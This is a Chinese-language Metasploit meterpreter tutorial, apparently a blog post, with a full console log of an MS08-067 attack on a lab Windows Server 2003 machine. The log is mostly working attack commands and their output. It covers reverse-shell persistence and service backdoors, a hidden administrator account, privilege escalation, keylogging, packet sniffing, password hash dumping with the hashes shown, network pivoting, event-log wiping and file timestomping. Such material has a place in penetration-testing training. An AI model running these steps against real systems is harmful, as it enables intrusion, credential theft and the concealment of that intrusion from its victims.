九、強大的meterpreter

1.再探metasploit的攻擊載荷模塊

（1）典型的攻擊載荷模塊

metasploit涵蓋了各大主流操作系統和平台，其中絕大部分是遠程漏洞利用所使用的攻擊載荷模塊，功能一般是開啟遠程shell，遠程執行命令。

metasploit支持用戶將自己的shellcode導入框架中，只需將payload替換成自己的shellcode代碼，修改一下描述等基礎信息即可。

（2）使用攻擊載荷模塊

• search 搜索，查詢
• info 查看具體信息
• msfpayload 對shellcode進行查看，管理

（3）meterpreter技術優勢

• 平台通用性
• 純內存工作模式
• 靈活且加密的通信協議
• 易於擴展

2.meterpreter命令詳解

（1）基本命令

1.background 將meterpreter終端隱藏在後頭
2.sessions 查看已經成功獲取的會話，如果想繼續和某個會話進行交互，使用session -i命令
3.quit 關閉當前會話
4.shell 可以獲取系統的控制台shell
5.irb 可以在meterpreter中與ruby交互

（2）文件系統命令

1.cat 查看文件內容
2.getwd 獲得目標機上當前的工作目錄
3.upload 上傳文件
4.download 下載文件
5.edit 可以調用vi編輯器，進行編輯
6.search 搜索

（3）網路命令

1.ipconfig 查看網路介面信息
2.portfwd 埠轉發
3.route 顯示路由信息

（4）系統命令

1.ps 獲得正在運行的進程信息
2.migrate 將meterpreter會話從一個進程移植到另一個進程中
3.execute 在目標機上執行文件
4.getpid 獲得當前會話所在進程的PID
5.kill 終結會話
6.getuid 獲得運行meterpreter會話的用戶名
7.sysinfo 得到目標系統的一些信息
8.shutdown 關機

3.後滲透攻擊模塊

post後滲透模塊，用法和滲透攻擊模塊類似，指定session即可。

4.Meterpreter在滲透測試中的應用

（1）persistence 後滲透模塊

通過在目標主機安裝自啟動長久控制目標主機

（2）metsvc 後滲透模塊

將meterpreter以系統服務的形式安裝到目標主機上

（3）getgui 後滲透模塊

開啟遠程桌面

（4）許可權提升

• getsystem 集成四種提升技術。 -h可查看
• 利用MS10-073和MS10-092漏洞
• service_perssions模塊

（5）信息竊取

• dumplink 獲得目標主機最近進行的系統操作，訪問文件和文檔的操作記錄
• enum_applications 獲得目標主機安裝的軟體，安全更新與漏洞補丁的信息
• keyscan 鍵盤記錄的用戶輸入模塊

（6）口令攝取和利用

• 網路嗅探 sniffer模塊
• 通過瀏覽器進行攝取 enum_ie模塊 讀取緩存的IE瀏覽器密碼
• 系統口令攝取 hashdump 直接獲取系統的密碼哈希 smart_hashdump 後滲透模塊hash口令利用：直接用破解工具破解或者直接重放利用psexec: 利用系統口令哈希進行傳遞攻擊

（7）內網拓展

• 添加路由 用route命令添加路由
• 進行埠掃描
• 利用哈希口令進行攻擊
• MS08-068和MS10-046漏洞配合
• 搭建SMB伺服器 smb_relay模塊
• 結果分析

（8）掩蹤滅跡

• clearev 清除訪問日誌
• timestomp 修改文件的創建、最後訪問的時間

實踐

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.210
LHOST => 192.168.1.210
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.1.130
RHOST => 192.168.1.130
msf exploit(windows/smb/ms08_067_netapi) > set target 3
target => 3
msf exploit(windows/smb/ms08_067_netapi) > exploit

[*] 192.168.1.130:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.1.130:4444
[*] Sending stage (179779 bytes) to 192.168.1.130
[*] Meterpreter session 1 opened (192.168.1.210:40519 -> 192.168.1.130:4444) at 2018-10-13 13:24:25 +0800

meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/smb/ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1796 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:WINDOWSsystem32>exit
exit
meterpreter > irb
[*] Starting IRB shell
[*] The "client" variable holds the meterpreter client

>> client.sys.config.sysinfo()
=> {"Computer"=>"ROOT-TVI862UBEH", "OS"=>"Windows .NET Server (Build 3790).", "Architecture"=>"x86", "BuildTuple"=>nil, "System Language"=>"en_US", "Domain"=>"WORKGROUP", "Logged On Users"=>2}
>> client.railgun.shell32.IsUserAnAdmin
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true}
>> client.railgun.kernel32.SetThreadExecutionState("ES_CONTINUOUS|ES_SYSTEM_REQUIRED")
=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>2147483648}
>> exit
meterpreter > cat c:\boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Windows Server 2003, Enterprise" /fastdetect
meterpreter > getwd
C:WINDOWSsystem32
meterpreter > getlwd
/root
meterpreter > upload -h
Usage: upload [options] src1 src2 src3 ... destination

Uploads local files and directories to the remote machine.

OPTIONS:

-h Help banner
-r Upload recursively

meterpreter > pwd
C:WINDOWSsystem32
meterpreter > upload poc.py
[*] uploading : poc.py -> poc.py
[*] Uploaded 733.00 B of 733.00 B (100.0%): poc.py -> poc.py
[*] uploaded : poc.py -> poc.py
meterpreter > download poc.py
[*] Downloading: poc.py -> poc.py
[*] Downloaded 733.00 B of 733.00 B (100.0%): poc.py -> poc.py
[*] download : poc.py -> poc.py
meterpreter > edit c:\windows\system32\drivers\etc\hosts
meterpreter > search -h
Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.

OPTIONS:

-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> A file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner
-r <opt> Recursivly search sub directories. (Default: true)

meterpreter > search -d c:\windows -f *.mdb
Found 2 results...
c:windowssystem32iasdnary.mdb (294912 bytes)
c:windowssystem32iasias.mdb (249856 bytes)
meterpreter > ipconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1

Interface 65539
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:89:0b:d0
MTU : 1500
IPv4 Address : 192.168.1.130
IPv4 Netmask : 255.255.255.0

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-h Help banner.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
meterpreter > portfwd add -l 1234 -p 6001 -r 192.168.1.130
[*] Local TCP relay created: :1234 <-> 192.168.1.130:6001
meterpreter > route

IPv4 network routes
===================

Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.1.1 10 65539
127.0.0.0 255.0.0.0 127.0.0.1 1 1
192.168.1.0 255.255.255.0 192.168.1.130 10 65539
192.168.1.130 255.255.255.255 127.0.0.1 10 1
192.168.1.255 255.255.255.255 192.168.1.130 10 65539
224.0.0.0 240.0.0.0 192.168.1.130 10 65539
255.255.255.255 255.255.255.255 192.168.1.130 1 65539

No IPv6 routes were found.
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
...
304 1980 VMwareUser.exe x86 0 ROOT-TVI862UBEHAdministrator C:Program FilesVMwareVMware ToolsVMwareUser.exe
...
meterpreter > migrate 304
...
[*] Migrating from 1028 to 304...
[*] Migration completed successfully.
[*] Recreating TCP relay(s)...
[*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.1.130:6001
meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.

OPTIONS:

-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The dummy executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-k Execute process on the meterpreters current desktop
-m Execute from memory.
-s <opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token
meterpreter > execute -H -f cmd.exe
Process 4948 created.
meterpreter > execute -H -i -f cmd.exe
Process 5228 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:Documents and SettingsAdministrator>exit
exit
meterpreter > execute -H -m -d calc.exe -f wec.exe -a "-o foo.txt"
meterpreter > getpid
Current pid: 304
meterpreter > kill 1840
meterpreter > getuid
Server username: ROOT-TVI862UBEHAdministrator
meterpreter > sysinfo
Computer : ROOT-TVI862UBEH
OS : Windows .NET Server (Build 3790).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/forensics/enum_drives
msf post(windows/gather/forensics/enum_drives) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows ROOT-TVI862UBEHAdministrator @ ROOT-TVI862UBEH 192.168.1.210:40519 -> 192.168.1.130:4444 (192.168.1.130)

msf post(windows/gather/forensics/enum_drives) > set session 1
session => 1
msf post(windows/gather/forensics/enum_drives) > exploit

Device Name: Type: Size (bytes):
------------ ----- -------------
<Physical Drives:>
\.PhysicalDrive0 4702111234474983745
<Logical Drives:>
\.A: 4702111234474983745
\.C: 4702111234474983745
\.D: 4702111234474983745
[*] Post module execution completed
msf post(windows/gather/forensics/enum_drives) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/checkvm

[*] Checking if ROOT-TVI862UBEH is a Virtual Machine .....
[+] This is a VMware Virtual Machine
meterpreter > run persistence -X -i 5 -p 443 -r 192.168.1.210

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ROOT-TVI862UBEH_20181013.5800/ROOT-TVI862UBEH_20181013.5800.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.210 LPORT=443
[*] Persistent agent script is 99610 bytes long
[+] Persistent Script written to C:DOCUME~1ADMINI~1LOCALS~1TempDQehvG.vbs
[*] Executing script C:DOCUME~1ADMINI~1LOCALS~1TempDQehvG.vbs
[+] Agent executed with PID 4976
[*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRuncvuNVUtJDqqUNBs
[+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRuncvuNVUtJDqqUNBs
meterpreter > run metsvc

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:DOCUME~1ADMINI~1LOCALS~1TemphfmBMnhj...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
# 刪除服務sc delete "metsvc"

meterpreter > run getgui -u metasploit -p meterpreter

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[*] Setting user account for logon
[*] Adding User: metasploit with Password: meterpreter
[*] Hiding user from Windows Login screen
[*] Adding User: metasploit to local group Remote Desktop Users
[*] Adding User: metasploit to local group Administrators
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20181013.5921.rc
meterpreter > run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20181013.5921.rc
[*] Running Command List ...
[*] Running command execute -H -f cmd.exe -a "/c net user metasploit /delete"
Process 6592 created.
[*] Running command reg deleteval -k HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -v metasploit
Successfully deleted metasploit.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > run post/windows/gather/dumplinks

[*] Running module against ROOT-TVI862UBEH
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:Documents and SettingsAdministratorRecent...
...
meterpreter > run post/windows/gather/enum_applications
...
Windows Installer 3.1 (KB893803) 3.1

[+] Results stored in: /root/.msf4/loot/20181013140645_default_192.168.1.130_host.application_531976.txt
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
<CR>
<CR>
hello world<Right Shift>!!!<^S>

meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter > use sniffer
Loading extension sniffer...Success.
meterpreter > sniffer_interfaces

1 - Intel(R) PRO/1000 MT Network Connection ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump 1 /tmp/win2k3.cap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 163 packets (47049 bytes)
[*] Downloaded 100% (47049/47049)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/win2k3.cap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 106 packets (27046 bytes) remaining
[*] Download or release them using sniffer_dump or sniffer_release
meterpreter > run post/windows/gather/enum_ie

[*] IE Version: 6.0.3790.0
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
File: C:Documents and SettingsAdministratorLocal SettingsHistoryHistory.IE5index.dat
[*] Retrieving cookies.....
File: C:Documents and SettingsAdministratorCookiesindex.dat
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...
[*] Writing history to loot...
[+] Data saved in: /root/.msf4/loot/20181013141020_default_192.168.1.130_ie.history_933570.txt
meterpreter > hashdump
Administrator:500:a9a1d510b01177d1aad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::
...
meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against ROOT-TVI862UBEH
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20181013141207_default_192.168.1.130_windows.hashes_669593.txt
...
[+] Administrator:500:a9a1d510b01177d1aad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::
[+] IUSR_ROOT-TVI862UBEH:1004:7d730a3707abd506a84a60b453cab938:42fc0d1aaf3eeda15e9c5e64322a29e1:::
[+] IWAM_ROOT-TVI862UBEH:1006:72f7503120401ee0845a72ccde743c03:cb7625dafeb8908bb37b5730d7d36867:::
[+] ASPNET:1008:b4df3d6cb6929cc09cb07285b13aca78:9c8be841d72dbd132d22477ff8b7e9d3:::
meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 1...
msf post(windows/gather/forensics/enum_drives) > route add 10.10.10.0 255.255.255.0 1
[*] Route added
msf post(windows/gather/forensics/enum_drives) > route print

IPv4 Active Routing Table
=========================

Subnet Netmask Gateway
------ ------- -------
10.10.10.0 255.255.255.0 Session 1

[*] There are currently no IPv6 routes defined.

msf post(windows/gather/forensics/enum_drives) > route del 10.10.10.0 255.255.255.0 1
[*] Route removed
msf post(windows/gather/forensics/enum_drives) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > clearev
[*] Wiping 930 records from Application...
[*] Wiping 1329 records from System...
[*] Wiping 1218 records from Security...
meterpreter > timestomp poc.py -f
[*] Pulling MACE attributes from
[-] priv_fs_get_file_mace: Operation failed: The handle is invalid.
meterpreter > upload jnx.txt
[*] uploading : jnx.txt -> jnx.txt
[*] Uploaded 530.00 B of 530.00 B (100.0%): jnx.txt -> jnx.txt
[*] uploaded : jnx.txt -> jnx.txt
meterpreter > timestomp poc.py -f jnx.txt
[*] Pulling MACE attributes from jnx.txt
[*] Setting specific MACE attributes on poc.py
[-] priv_fs_set_file_mace: Operation failed: The handle is invalid.
meterpreter > upload poc.py
[*] uploading : poc.py -> poc.py
[*] Uploaded 733.00 B of 733.00 B (100.0%): poc.py -> poc.py
[*] uploaded : poc.py -> poc.py
meterpreter > timestomp poc.py -f jnx.txt
[*] Pulling MACE attributes from jnx.txt
[*] Setting specific MACE attributes on poc.py

留後門：

1.Metsvc(通過服務安裝)

meterpreter > run metsvc

這個時候我們去連接它

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/metsvc_
set payload windows/metsvc_bind_tcp set payload windows/metsvc_reverse_tcp
msf exploit(multi/handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(multi/handler) > set RHOST 192.168.1.130
RHOST => 192.168.1.130
msf exploit(multi/handler) > set LPORT 31337
LPORT => 31337
msf exploit(multi/handler) > exploit
...
#個人感覺沒有persistence好用，又容易留痕迹。

2.persistence(目標機啟動自動連接)

meterpreter > run persistence -X -i 5 -p 443 -r 192.168.1.210

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ROOT-TVI862UBEH_20181013.2609/ROOT-TVI862UBEH_20181013.2609.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.210 LPORT=443
[*] Persistent agent script is 99672 bytes long
[+] Persistent Script written to C:WINDOWSTEMPTmwXVpORhOVej.vbs
[*] Executing script C:WINDOWSTEMPTmwXVpORhOVej.vbs
[+] Agent executed with PID 4712
[*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRun ccjYaIV
[+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRun ccjYaIV

然後重啟試下：

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.210
LHOST => 192.168.1.210
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.210:443
[*] Sending stage (179779 bytes) to 192.168.1.130
[*] Meterpreter session 1 opened (192.168.1.210:443 -> 192.168.1.130:1031) at 2018-10-13 15:30:20 +0800

meterpreter >

可以自動回聯。

推薦閱讀：

相关文章